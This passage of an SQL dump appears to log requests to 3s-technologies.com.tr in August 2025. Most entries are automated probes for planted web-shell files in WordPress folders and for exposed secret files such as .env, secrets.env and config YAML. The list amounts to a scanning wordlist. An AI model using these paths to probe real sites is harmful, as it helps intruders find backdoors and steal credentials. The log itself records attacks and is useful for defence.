00:00:00',301),(44291,'http://3s-technologies.com.tr/tr/about/css_compare.php',NULL,'','',2,0,'2025-08-07 05:43:05','0000-00-00 00:00:00',301),(44292,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-help/setup-config.php',NULL,'','',2,0,'2025-08-07 05:43:06','0000-00-00 00:00:00',301),(44293,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/about.php7',NULL,'','',3,0,'2025-08-07 05:43:07','0000-00-00 00:00:00',301),(44294,'http://3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/info.php',NULL,'','',2,0,'2025-08-07 05:43:08','0000-00-00 00:00:00',301),(44295,'http://3s-technologies.com.tr/tr/wp-includes/php-compat/db.php?u',NULL,'','',2,0,'2025-08-07 05:43:08','0000-00-00 00:00:00',301),(44296,'http://3s-technologies.com.tr/tr/index/wp-conflg.php',NULL,'','',2,0,'2025-08-07 05:43:09','0000-00-00 00:00:00',301),(44297,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/class.php',NULL,'','',3,0,'2025-08-07 05:43:10','0000-00-00 00:00:00',301),(44298,'http://3s-technologies.com.tr/tr/assets/images/test.php',NULL,'','',2,0,'2025-08-07 05:43:10','0000-00-00 00:00:00',301),(44299,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/simple.php',NULL,'','',2,0,'2025-08-07 05:43:12','0000-00-00 00:00:00',301),(44300,'http://3s-technologies.com.tr/tr/wp-admin/js/baxa1.php8',NULL,'','',3,0,'2025-08-07 05:43:13','0000-00-00 00:00:00',301),(44301,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/ben.php',NULL,'','',2,0,'2025-08-07 05:43:13','0000-00-00 00:00:00',301),(44302,'http://3s-technologies.com.tr/tr/wp-includes/pomo/cc.php',NULL,'','',3,0,'2025-08-07 05:43:14','0000-00-00 00:00:00',301),(44303,'http://3s-technologies.com.tr/tr/wp-includes/widgets/up/wp-admin/0x.php',NULL,'','',1,0,'2025-08-07 05:43:15','0000-00-00 00:00:00',301),(44304,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/wp-conflg.php',NULL,'','',3,0,'2025-08-07 05:43:16','0000-00-00 00:00:00',301),(44305,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/as.php',NULL,'','',3,0,'2025-08-07 05:43:16','0000-00-00 00:00:00',301),(44306,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/wp-conflg.php/wp-content/plugins/google-seo-rank/wp-configs.php',NULL,'','',3,0,'2025-08-07 05:43:18','0000-00-00 00:00:00',301),(44307,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-help/inputs.php',NULL,'','',3,0,'2025-08-07 05:43:19','0000-00-00 00:00:00',301),(44308,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/readme.php',NULL,'','',2,0,'2025-08-07 05:43:20','0000-00-00 00:00:00',301),(44309,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/ty.php',NULL,'','',2,0,'2025-08-07 05:43:21','0000-00-00 00:00:00',301),(44310,'http://3s-technologies.com.tr/tr/wp-includes/widgets/cong.php',NULL,'','',2,0,'2025-08-07 05:43:22','0000-00-00 00:00:00',301),(44311,'http://3s-technologies.com.tr/tr/wp-admin/css/moon.php',NULL,'','',2,0,'2025-08-07 05:43:23','0000-00-00 00:00:00',301),(44312,'http://3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/wp-damin.php',NULL,'','',2,0,'2025-08-07 05:43:23','0000-00-00 00:00:00',301),(44313,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/classwithtostring.php',NULL,'','',2,0,'2025-08-07 05:43:24','0000-00-00 00:00:00',301),(44314,'http://3s-technologies.com.tr/tr/wp-includes/php-compat/test.php',NULL,'','',2,0,'2025-08-07 05:43:25','0000-00-00 00:00:00',301),(44315,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/setup-config.php',NULL,'','',2,0,'2025-08-07 05:43:26','0000-00-00 00:00:00',301),(44316,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/buy.php',NULL,'','',3,0,'2025-08-07 05:43:27','0000-00-00 00:00:00',301),(44317,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/about.php7',NULL,'','',2,0,'2025-08-07 05:43:28','0000-00-00 00:00:00',301),(44318,'http://3s-technologies.com.tr/tr/wp-includes/assets/cong.php',NULL,'','',2,0,'2025-08-07 05:43:29','0000-00-00 00:00:00',301),(44319,'http://3s-technologies.com.tr/tr/admin/install.php',NULL,'','',3,0,'2025-08-07 05:43:30','0000-00-00 00:00:00',301),(44320,'http://3s-technologies.com.tr/tr/images/link.php',NULL,'','',2,0,'2025-08-07 05:43:31','0000-00-00 00:00:00',301),(44321,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/endpoints/log.php',NULL,'','',2,0,'2025-08-07 05:43:31','0000-00-00 00:00:00',301),(44322,'http://3s-technologies.com.tr/tr/wp-admin/user/classwithtostring.php',NULL,'','',2,0,'2025-08-07 05:43:32','0000-00-00 00:00:00',301),(44323,'http://3s-technologies.com.tr/tr/perodua-malaysia/mail.php',NULL,'','',1,0,'2025-08-07 09:19:52','0000-00-00 00:00:00',301),(44324,'http://3s-technologies.com.tr/tr/feed/atom',NULL,'','',2,0,'2025-08-07 09:20:13','0000-00-00 00:00:00',301),(44325,'http://3s-technologies.com.tr/tr/app/webroot/filemanager.php',NULL,'','',10,0,'2025-08-07 09:20:13','0000-00-00 00:00:00',301),(44326,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/ben.php',NULL,'','',1,0,'2025-08-07 09:20:22','0000-00-00 00:00:00',301),(44327,'http://3s-technologies.com.tr/tr/img/ben.php',NULL,'','',1,0,'2025-08-07 09:20:23','0000-00-00 00:00:00',301),(44328,'http://3s-technologies.com.tr/tr/wp-content/plugins/core-plugin/ben.php',NULL,'','',1,0,'2025-08-07 09:20:29','0000-00-00 00:00:00',301),(44329,'http://3s-technologies.com.tr/tr/.well-known/ben.php',NULL,'','',1,0,'2025-08-07 09:20:38','0000-00-00 00:00:00',301),(44330,'http://3s-technologies.com.tr/tr/about/ben.php',NULL,'','',1,0,'2025-08-07 09:20:44','0000-00-00 00:00:00',301),(44331,'http://3s-technologies.com.tr/tr/wp-admin/network/index.php/.well-known/acme-challenge/admin.php',NULL,'','',1,0,'2025-08-07 09:20:54','0000-00-00 00:00:00',301),(44332,'http://3s-technologies.com.tr/tr/wp-content/uploads/ben.php',NULL,'','',1,0,'2025-08-07 09:20:56','0000-00-00 00:00:00',301),(44333,'http://3s-technologies.com.tr/tr/wp-includes/ben.php',NULL,'','',1,0,'2025-08-07 09:21:12','0000-00-00 00:00:00',301),(44334,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/admin.php',NULL,'','',1,0,'2025-08-07 09:21:34','0000-00-00 00:00:00',301),(44335,'http://3s-technologies.com.tr/tr/sk/makeasmtp.php',NULL,'','',1,0,'2025-08-07 09:21:35','0000-00-00 00:00:00',301),(44336,'http://3s-technologies.com.tr/tr/wp-content/upgrade/ben.php',NULL,'','',1,0,'2025-08-07 09:21:40','0000-00-00 00:00:00',301),(44337,'https://3s-technologies.com.tr/tr/kart-ueretim-teknolojileri\n',NULL,'','',1,0,'2025-08-08 15:56:18','0000-00-00 00:00:00',301),(44338,'http://3s-technologies.com.tr/tr/stat.php',NULL,'','',3,0,'2025-08-08 17:48:53','0000-00-00 00:00:00',301),(44339,'http://3s-technologies.com.tr/tr/twilio.env',NULL,'','',3,0,'2025-08-08 18:18:14','0000-00-00 00:00:00',301),(44340,'https://3s-technologies.com.tr/tr/app_dev.php/_profiler/phpinfo',NULL,'','',3,0,'2025-08-08 18:18:26','0000-00-00 00:00:00',301),(44341,'http://www.3s-technologies.com.tr/tr/laravel/.env',NULL,'','',3,0,'2025-08-08 18:18:32','0000-00-00 00:00:00',301),(44342,'http://www.3s-technologies.com.tr/tr/.config.yaml',NULL,'','',3,0,'2025-08-08 18:18:33','0000-00-00 00:00:00',301),(44343,'http://3s-technologies.com.tr/tr/.config.yaml',NULL,'','',3,0,'2025-08-08 18:18:35','0000-00-00 00:00:00',301),(44344,'https://www.3s-technologies.com.tr/tr/.config.yaml',NULL,'','',2,0,'2025-08-08 18:18:35','0000-00-00 00:00:00',301),(44345,'http://www.3s-technologies.com.tr/tr/backend/.env',NULL,'','',3,0,'2025-08-08 18:18:36','0000-00-00 00:00:00',301),(44346,'https://www.3s-technologies.com.tr/tr/backend/.env',NULL,'','',5,0,'2025-08-08 18:18:37','0000-00-00 00:00:00',301),(44347,'http://www.3s-technologies.com.tr/tr/secrets.env',NULL,'','',3,0,'2025-08-08 18:18:38','0000-00-00 00:00:00',301),(44348,'https://www.3s-technologies.com.tr/tr/secrets.env',NULL,'','',1,0,'2025-08-08 18:18:39','0000-00-00 00:00:00',301),(44349,'http://3s-technologies.com.tr/tr/secrets.env',NULL,'','',2,0,'2025-08-08 18:18:40','0000-00-00 00:00:00',301),(44350,'http://www.3s-technologies.com.tr/tr/.env.example',NULL,'','',3,0,'2025-08-08 18:18:41','0000-00-00 00:00:00',301),(44351,'https://www.3s-technologies.com.tr/tr/.env.example',NULL,'','',1,0,'2025-08-08 18:18:41','0000-00-00 00:00:00',301),(44352,'http://www.3s-technologies.com.tr/tr/web/.env',NULL,'','',3,0,'2025-08-08 18:18:42','0000-00-00 00:00:00',301),(44353,'https://www.3s-technologies.com.tr/tr/web/.env',NULL,'','',1,0,'2025-08-08 18:18:43','0000-00-00 00:00:00',301),(44354,'http://www.3s-technologies.com.tr/tr/.env.bak',NULL,'','',3,0,'2025-08-08 18:18:44','0000-00-00 00:00:00',301),(44355,'http://3s-technologies.com.tr/tr/web/.env',NULL,'','',4,0,'2025-08-08 18:18:45','0000-00-00 00:00:00',301),(44356,'https://www.3s-technologies.com.tr/tr/.env.bak',NULL,'','',3,0,'2025-08-08 18:18:45','0000-00-00 00:00:00',301),(44357,'http://www.3s-technologies.com.tr/tr/staging/.env',NULL,'','',3,0,'2025-08-08 18:18:46','0000-00-00 00:00:00',301),(44358,'https://www.3s-technologies.com.tr/tr/staging/.env',NULL,'','',1,0,'2025-08-08 18:18:47','0000-00-00 00:00:00',301),(44359,'http://3s-technologies.com.tr/tr/staging/.env',NULL,'','',4,0,'2025-08-08 18:18:47','0000-00-00 00:00:00',301),(44360,'http://www.3s-technologies.com.tr/tr/debug/default/view?panel=config',NULL,'','',3,0,'2025-08-08 18:18:49','0000-00-00 00:00:00',301),(44361,'https://www.3s-technologies.com.tr/tr/debug/default/view?panel=config',NULL,'','',1,0,'2025-08-08 18:18:50','0000-00-00 00:00:00',301),(44362,'http://www.3s-technologies.com.tr/tr/core/.env',NULL,'','',3,0,'2025-08-08 18:18:51','0000-00-00 00:00:00',301),(44363,'http://www.3s-technologies.com.tr/tr/info',NULL,'','',2,0,'2025-08-08 18:18:55','0000-00-00 00:00:00',301),(44364,'https://www.3s-technologies.com.tr/tr/info',NULL,'','',1,0,'2025-08-08 18:18:58','0000-00-00 00:00:00',301),(44365,'http://www.3s-technologies.com.tr/tr/images/.env',NULL,'','',1,0,'2025-08-08 18:18:59','0000-00-00 00:00:00',301),(44366,'https://www.3s-technologies.com.tr/tr/images/.env',NULL,'','',1,0,'2025-08-08 18:18:59','0000-00-00 00:00:00',301),(44367,'http://www.3s-technologies.com.tr/tr/.env.save.1',NULL,'','',1,0,'2025-08-08 18:19:00','0000-00-00 00:00:00',301),(44368,'https://www.3s-technologies.com.tr/tr/.env.save.1',NULL,'','',1,0,'2025-08-08 18:19:02','0000-00-00 00:00:00',301),(44369,'http://www.3s-technologies.com.tr/tr/.env.save',NULL,'','',1,0,'2025-08-08 18:19:02','0000-00-00 00:00:00',301),(44370,'http://3s-technologies.com.tr/tr/images/.env',NULL,'','',2,0,'2025-08-08 18:19:04','0000-00-00 00:00:00',301),(44371,'http://www.3s-technologies.com.tr/tr/app/.env',NULL,'','',1,0,'2025-08-08 18:19:06','0000-00-00 00:00:00',301),(44372,'http://3s-technologies.com.tr/tr/.env.save.1',NULL,'','',2,0,'2025-08-08 18:19:07','0000-00-00 00:00:00',301),(44373,'https://www.3s-technologies.com.tr/tr/test',NULL,'','',1,0,'2025-08-08 18:19:11','0000-00-00 00:00:00',301),(44374,'http://3s-technologies.com.tr/tr/wp-includes/id3/taptap-null.php',NULL,'','',1,0,'2025-08-09 00:40:18','0000-00-00 00:00:00',301),(44375,'http://3s-technologies.com.tr/tr/.well-known/about/function.php',NULL,'','',14,0,'2025-08-09 00:53:04','0000-00-00 00:00:00',301),(44376,'http://3s-technologies.com.tr/tr/about/geforce.php',NULL,'','',7,0,'2025-08-09 00:53:13','0000-00-00 00:00:00',301),(44377,'http://3s-technologies.com.tr/tr/akc.php',NULL,'','',99,0,'2025-08-09 00:53:18','0000-00-00 00:00:00',301),(44378,'http://3s-technologies.com.tr/tr/mini',NULL,'','',19,0,'2025-08-09 00:53:52','0000-00-00 00:00:00',301),(44379,'http://3s-technologies.com.tr/tr/thoms.php',NULL,'','',27,0,'2025-08-09 00:54:10','0000-00-00 00:00:00',301),(44380,'http://3s-technologies.com.tr/tr/wp-error.php',NULL,'','',18,0,'2025-08-09 00:54:43','0000-00-00 00:00:00',301),(44381,'http://3s-technologies.com.tr/tr/file3.php',NULL,'','',53,0,'2025-08-09 12:20:14','0000-00-00 00:00:00',301),(44382,'http://3s-technologies.com.tr/tr/file4.php',NULL,'','',52,0,'2025-08-09 12:20:15','0000-00-00 00:00:00',301),(44383,'http://3s-technologies.com.tr/tr/file6.php',NULL,'','',58,0,'2025-08-09 12:20:17','0000-00-00 00:00:00',301),(44384,'http://3s-technologies.com.tr/tr/file8.php',NULL,'','',33,0,'2025-08-09 12:20:19','0000-00-00 00:00:00',301),(44385,'http://3s-technologies.com.tr/tr/file9.php',NULL,'','',98,0,'2025-08-09 12:20:20','0000-00-00 00:00:00',301),(44386,'http://3s-technologies.com.tr/tr/.trash7309/index.php',NULL,'','',27,0,'2025-08-09 12:20:21','0000-00-00 00:00:00',301),(44387,'http://3s-technologies.com.tr/tr/wp-includes/blocks/webadmin.php',NULL,'','',1,0,'2025-08-09 15:25:31','0000-00-00 00:00:00',301),(44388,'http://3s-technologies.com.tr/tr/files/buy.php',NULL,'','',1,0,'2025-08-09 15:25:32','0000-00-00 00:00:00',301),(44389,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/up.php',NULL,'','',1,0,'2025-08-09 15:25:35','0000-00-00 00:00:00',301),(44390,'http://3s-technologies.com.tr/tr/update/edit.php',NULL,'','',1,0,'2025-08-09 15:25:36','0000-00-00 00:00:00',301),(44391,'http://3s-technologies.com.tr/tr/wp-admin/css/buy.php',NULL,'','',1,0,'2025-08-09 15:25:37','0000-00-00 00:00:00',301),(44392,'http://3s-technologies.com.tr/tr/wp-includes/assets/0x.php',NULL,'','',1,0,'2025-08-09 15:25:38','0000-00-00 00:00:00',301),(44393,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/hehe.php',NULL,'','',1,0,'2025-08-09 15:25:39','0000-00-00 00:00:00',301),(44394,'http://3s-technologies.com.tr/tr/wp-includes/id3/readme.php',NULL,'','',1,0,'2025-08-09 15:25:40','0000-00-00 00:00:00',301),(44395,'http://3s-technologies.com.tr/tr/wp-admin/js/text.php',NULL,'','',1,0,'2025-08-09 15:25:41','0000-00-00 00:00:00',301),(44396,'http://3s-technologies.com.tr/tr/wp-includes/customize/makeasmtp.php',NULL,'','',1,0,'2025-08-09 15:25:42','0000-00-00 00:00:00',301),(44397,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/install.php',NULL,'','',1,0,'2025-08-09 15:25:43','0000-00-00 00:00:00',301),(44398,'http://3s-technologies.com.tr/tr/wp-includes/js/test.php',NULL,'','',1,0,'2025-08-09 15:25:44','0000-00-00 00:00:00',301),(44399,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/install.php',NULL,'','',1,0,'2025-08-09 15:25:45','0000-00-00 00:00:00',301),(44400,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/mpvloi.php',NULL,'','',1,0,'2025-08-09 15:25:46','0000-00-00 00:00:00',301),(44401,'http://3s-technologies.com.tr/tr/wp-includes/php-compat/ben.php',NULL,'','',1,0,'2025-08-09 15:25:47','0000-00-00 00:00:00',301),(44402,'http://3s-technologies.com.tr/tr/js/core.php',NULL,'','',1,0,'2025-08-09 15:25:48','0000-00-00 00:00:00',301),(44403,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/jp.php',NULL,'','',1,0,'2025-08-09 15:25:48','0000-00-00 00:00:00',301),(44404,'http://3s-technologies.com.tr/tr/wp-content/themes/cay-van-phong/file.php',NULL,'','',1,0,'2025-08-09 15:25:49','0000-00-00 00:00:00',301),(44405,'http://3s-technologies.com.tr/tr/wp-includes/fonts/media.php.infected.php',NULL,'','',1,0,'2025-08-09 15:25:50','0000-00-00 00:00:00',301),(44406,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-help/system_log.php',NULL,'','',1,0,'2025-08-09 15:25:52','0000-00-00 00:00:00',301),(44407,'http://3s-technologies.com.tr/tr/files/text.php',NULL,'','',1,0,'2025-08-09 15:25:53','0000-00-00 00:00:00',301),(44408,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/alfa-rex.php',NULL,'','',1,0,'2025-08-09 15:25:53','0000-00-00 00:00:00',301),(44409,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/info.php',NULL,'','',1,0,'2025-08-09 15:25:56','0000-00-00 00:00:00',301),(44410,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/radio.php',NULL,'','',1,0,'2025-08-09 15:25:56','0000-00-00 00:00:00',301),(44411,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/defaults.php',NULL,'','',1,0,'2025-08-09 15:25:57','0000-00-00 00:00:00',301),(44412,'http://3s-technologies.com.tr/tr/function/rk2.php',NULL,'','',1,0,'2025-08-09 15:25:58','0000-00-00 00:00:00',301),(44413,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/mpvloi.php',NULL,'','',1,0,'2025-08-09 15:25:59','0000-00-00 00:00:00',301),(44414,'http://3s-technologies.com.tr/tr/img/menu.php',NULL,'','',1,0,'2025-08-09 15:26:00','0000-00-00 00:00:00',301),(44415,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/fucku.php',NULL,'','',1,0,'2025-08-09 15:26:01','0000-00-00 00:00:00',301),(44416,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/ty.php',NULL,'','',1,0,'2025-08-09 15:26:02','0000-00-00 00:00:00',301),(44417,'http://3s-technologies.com.tr/tr/wp-includes/ixr/go.php',NULL,'','',1,0,'2025-08-09 15:26:03','0000-00-00 00:00:00',301),(44418,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/ty.php',NULL,'','',1,0,'2025-08-09 15:26:04','0000-00-00 00:00:00',301),(44419,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/maint.php',NULL,'','',1,0,'2025-08-09 15:26:05','0000-00-00 00:00:00',301),(44420,'http://3s-technologies.com.tr/tr/wp-includes/css_compare.php',NULL,'','',1,0,'2025-08-09 15:26:06','0000-00-00 00:00:00',301),(44421,'http://3s-technologies.com.tr/tr/wp-includes/text/wp_filemanager.php',NULL,'','',1,0,'2025-08-09 15:26:07','0000-00-00 00:00:00',301),(44422,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/jp.php',NULL,'','',1,0,'2025-08-09 15:26:08','0000-00-00 00:00:00',301),(44423,'http://3s-technologies.com.tr/tr/index/json.php',NULL,'','',1,0,'2025-08-09 15:26:09','0000-00-00 00:00:00',301),(44424,'http://3s-technologies.com.tr/tr/img/about.php7',NULL,'','',1,0,'2025-08-09 15:26:09','0000-00-00 00:00:00',301),(44425,'http://3s-technologies.com.tr/tr/wp-content/plugins/defaults.php',NULL,'','',1,0,'2025-08-09 15:26:10','0000-00-00 00:00:00',301),(44426,'http://3s-technologies.com.tr/tr/about/mah.php',NULL,'','',1,0,'2025-08-09 15:26:11','0000-00-00 00:00:00',301),(44427,'http://3s-technologies.com.tr/tr/js/wp-damin.php',NULL,'','',1,0,'2025-08-09 15:26:12','0000-00-00 00:00:00',301),(44428,'http://3s-technologies.com.tr/tr/wp-content/uploads/class.php',NULL,'','',1,0,'2025-08-09 15:26:13','0000-00-00 00:00:00',301),(44429,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/goat1.php',NULL,'','',1,0,'2025-08-09 15:26:14','0000-00-00 00:00:00',301),(44430,'http://3s-technologies.com.tr/tr/wp-includes/fonts/ben.php',NULL,'','',1,0,'2025-08-09 15:26:15','0000-00-00 00:00:00',301),(44431,'http://3s-technologies.com.tr/tr/wp-admin/includes/link.php',NULL,'','',1,0,'2025-08-09 15:26:16','0000-00-00 00:00:00',301),(44432,'http://3s-technologies.com.tr/tr/images/menu.php',NULL,'','',1,0,'2025-08-09 15:26:17','0000-00-00 00:00:00',301),(44433,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/fucku.php',NULL,'','',1,0,'2025-08-09 15:26:18','0000-00-00 00:00:00',301),(44434,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/function.php',NULL,'','',1,0,'2025-08-09 15:26:18','0000-00-00 00:00:00',301),(44435,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/network.php',NULL,'','',1,0,'2025-08-09 15:26:19','0000-00-00 00:00:00',301),(44436,'http://3s-technologies.com.tr/tr/wp-includes/html-api/core.php',NULL,'','',1,0,'2025-08-09 15:26:20','0000-00-00 00:00:00',301),(44437,'http://3s-technologies.com.tr/tr/wp-content/menu.php',NULL,'','',1,0,'2025-08-09 15:26:22','0000-00-00 00:00:00',301),(44438,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/cong.php',NULL,'','',1,0,'2025-08-09 15:26:23','0000-00-00 00:00:00',301),(44439,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/bless.php',NULL,'','',1,0,'2025-08-09 15:26:24','0000-00-00 00:00:00',301),(44440,'http://3s-technologies.com.tr/tr/wp-admin/network/0x.php',NULL,'','',1,0,'2025-08-09 15:26:25','0000-00-00 00:00:00',301),(44441,'http://3s-technologies.com.tr/tr/wp-content/uploads/0x.php',NULL,'','',1,0,'2025-08-09 15:26:26','0000-00-00 00:00:00',301),(44442,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/up',NULL,'','',1,0,'2025-08-09 15:26:27','0000-00-00 00:00:00',301),(44443,'http://3s-technologies.com.tr/tr/about/f35.php',NULL,'','',1,0,'2025-08-09 15:26:28','0000-00-00 00:00:00',301),(44444,'http://3s-technologies.com.tr/tr/wp-admin/images/class.php',NULL,'','',1,0,'2025-08-09 15:26:29','0000-00-00 00:00:00',301),(44445,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/item.php',NULL,'','',1,0,'2025-08-09 15:26:30','0000-00-00 00:00:00',301),(44446,'http://3s-technologies.com.tr/tr/wp-content/plugins/function.php',NULL,'','',1,0,'2025-08-09 15:26:32','0000-00-00 00:00:00',301),(44447,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/radio.php',NULL,'','',1,0,'2025-08-09 15:26:33','0000-00-00 00:00:00',301),(44448,'http://3s-technologies.com.tr/tr/wp-includes/php-compat/goat1.php',NULL,'','',1,0,'2025-08-09 15:26:34','0000-00-00 00:00:00',301),(44449,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/classwithtostring.php',NULL,'','',1,0,'2025-08-09 15:26:35','0000-00-00 00:00:00',301),(44450,'http://3s-technologies.com.tr/tr/wp-includes/db.php?u',NULL,'','',1,0,'2025-08-09 15:26:36','0000-00-00 00:00:00',301),(44451,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/menu.php',NULL,'','',1,0,'2025-08-09 15:26:37','0000-00-00 00:00:00',301),(44452,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/go.php',NULL,'','',1,0,'2025-08-09 15:26:38','0000-00-00 00:00:00',301),(44453,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/filemanager.php',NULL,'','',1,0,'2025-08-09 15:26:39','0000-00-00 00:00:00',301),(44454,'http://3s-technologies.com.tr/tr/wp-includes/id3/test.php',NULL,'','',1,0,'2025-08-09 15:26:40','0000-00-00 00:00:00',301),(44455,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/getid3s.php',NULL,'','',1,0,'2025-08-09 15:26:41','0000-00-00 00:00:00',301),(44456,'http://3s-technologies.com.tr/tr/img/file.php',NULL,'','',1,0,'2025-08-09 15:26:41','0000-00-00 00:00:00',301),(44457,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/upload.php',NULL,'','',1,0,'2025-08-09 15:26:45','0000-00-00 00:00:00',301),(44458,'http://3s-technologies.com.tr/tr/rk2.php',NULL,'','',31,0,'2025-08-09 15:26:46','0000-00-00 00:00:00',301),(44459,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/maint.php',NULL,'','',1,0,'2025-08-09 15:26:47','0000-00-00 00:00:00',301),(44460,'http://3s-technologies.com.tr/tr/wp-admin/includes/wp-trackback.php',NULL,'','',3,0,'2025-08-09 15:26:48','0000-00-00 00:00:00',301),(44461,'http://3s-technologies.com.tr/tr/wp-admin/images/css_compare.php',NULL,'','',1,0,'2025-08-09 15:26:49','0000-00-00 00:00:00',301),(44462,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/setup-config.php',NULL,'','',1,0,'2025-08-09 15:26:50','0000-00-00 00:00:00',301),(44463,'http://3s-technologies.com.tr/tr/wp-content/themes/gecko-litespeed.php',NULL,'','',1,0,'2025-08-09 15:26:50','0000-00-00 00:00:00',301),(44464,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/menu.php',NULL,'','',1,0,'2025-08-09 15:26:51','0000-00-00 00:00:00',301),(44465,'http://3s-technologies.com.tr/tr/wp-admin/includes/wp_filemanager.php',NULL,'','',1,0,'2025-08-09 15:26:52','0000-00-00 00:00:00',301),(44466,'http://3s-technologies.com.tr/tr/css_compare.php',NULL,'','',3,0,'2025-08-09 15:26:53','0000-00-00 00:00:00',301),(44467,'http://3s-technologies.com.tr/tr/function/mah.php',NULL,'','',1,0,'2025-08-09 15:26:54','0000-00-00 00:00:00',301),(44468,'http://3s-technologies.com.tr/tr/wp-includes/id3/buy.php',NULL,'','',1,0,'2025-08-09 15:26:56','0000-00-00 00:00:00',301),(44469,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/yes.php',NULL,'','',1,0,'2025-08-09 15:26:57','0000-00-00 00:00:00',301),(44470,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/class.php',NULL,'','',1,0,'2025-08-09 15:26:58','0000-00-00 00:00:00',301),(44471,'http://3s-technologies.com.tr/tr/wp-includes/customize/mail.php',NULL,'','',1,0,'2025-08-09 15:26:59','0000-00-00 00:00:00',301),(44472,'http://3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/edit-tags.php',NULL,'','',1,0,'2025-08-09 15:27:00','0000-00-00 00:00:00',301),(44473,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/media.php',NULL,'','',1,0,'2025-08-09 15:27:01','0000-00-00 00:00:00',301),(44474,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/buy.php',NULL,'','',1,0,'2025-08-09 15:27:02','0000-00-00 00:00:00',301),(44475,'http://3s-technologies.com.tr/tr/files/goat1.php',NULL,'','',1,0,'2025-08-09 15:27:03','0000-00-00 00:00:00',301),(44476,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/wp-trackback.php',NULL,'','',1,0,'2025-08-09 15:27:04','0000-00-00 00:00:00',301),(44477,'http://3s-technologies.com.tr/tr/wp-admin/includes/menu.php',NULL,'','',1,0,'2025-08-09 15:27:06','0000-00-00 00:00:00',301),(44478,'http://3s-technologies.com.tr/tr/wp-includes/html-api/db.php?u',NULL,'','',1,0,'2025-08-09 15:27:07','0000-00-00 00:00:00',301),(44479,'http://3s-technologies.com.tr/tr/wp-admin/js/hehe.php',NULL,'','',1,0,'2025-08-09 15:27:08','0000-00-00 00:00:00',301),(44480,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/hehe.php',NULL,'','',1,0,'2025-08-09 15:27:09','0000-00-00 00:00:00',301),(44481,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/cc.php',NULL,'','',1,0,'2025-08-09 15:27:10','0000-00-00 00:00:00',301),(44482,'http://3s-technologies.com.tr/tr/about/alfa-rex.php',NULL,'','',1,0,'2025-08-09 15:27:11','0000-00-00 00:00:00',301),(44483,'http://3s-technologies.com.tr/tr/assets/images/info.php',NULL,'','',1,0,'2025-08-09 15:27:12','0000-00-00 00:00:00',301),(44484,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/mpvloi.php',NULL,'','',1,0,'2025-08-09 15:27:13','0000-00-00 00:00:00',301),(44485,'http://3s-technologies.com.tr/tr/function/403.php',NULL,'','',1,0,'2025-08-09 15:27:14','0000-00-00 00:00:00',301),(44486,'http://3s-technologies.com.tr/tr/wp-content/uploads/2024/system_log.php',NULL,'','',1,0,'2025-08-09 15:27:15','0000-00-00 00:00:00',301),(44487,'http://3s-technologies.com.tr/tr/wp-admin/user/link.php',NULL,'','',1,0,'2025-08-09 15:27:16','0000-00-00 00:00:00',301),(44488,'http://3s-technologies.com.tr/tr/wp-includes/customize/go.php',NULL,'','',1,0,'2025-08-09 15:27:17','0000-00-00 